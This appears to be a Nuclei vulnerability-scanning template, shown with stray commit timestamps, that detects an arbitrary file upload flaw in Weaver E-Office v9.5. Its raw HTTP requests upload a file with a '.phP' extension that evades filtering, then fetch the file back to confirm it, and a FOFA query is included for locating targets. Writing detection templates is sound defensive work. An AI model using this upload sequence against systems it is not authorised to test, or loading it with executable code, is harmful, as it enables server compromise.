2023-09-05 07:47:45 +00:00
id : weaver-eoffice-file-upload
info :
name : Weaver E-Office v9.5 - Arbitrary File Upload
author : princechaddha
severity : high
description : |
Weaver E-Office version 9.5 is susceptible to an arbitrary file upload vulnerability. This flaw allows malicious actors to upload and execute arbitrary code or files without proper validation or authorization.
reference :
- https://github.com/RCEraser/cve/blob/main/Weaver.md
2023-09-06 09:49:36 +00:00
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 2
2023-09-06 09:49:36 +00:00
fofa-query : app="泛微-EOffice"
tags : e-office,weaver,intrusive,file-upload
2023-09-05 07:47:45 +00:00
variables :
filename : '{{rand_base(7, "abc")}}'
http :
- raw :
- |
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition : form-data; name="upload_quwan"; filename="{{filename}}.phP"
Content-Type : image/jpeg
{{randstr}}
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition : form-data; name="file"; filename=""
Content-Type : application/octet-stream
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
- |
GET /attachment/{{id}}/{{filename}}.phP HTTP/1.1
Host : {{Hostname}}
host-redirects : true
max-redirects : 2
2023-10-14 11:27:55 +00:00
2023-09-05 07:47:45 +00:00
matchers-condition : and
matchers :
- type : word
part : body_2
words :
- '{{randstr}}'
extractors :
- type : regex
name : id
part : body
group : 1
internal : true
regex :
- '\\\/attachment\\\/([0-9]+)\\\/'
2023-10-20 11:41:13 +00:00
# digest: 4b0a00483046022100cb2ea659985e0e6a70be38ce3127d612a7bb63b072df2cb43e4efe695bd304b0022100d305f452c2f830e004937b472bc867c5d0e8feab8e0846a113a5d8a5e163c33b:922c64590222798bb761d5b6d8e72950
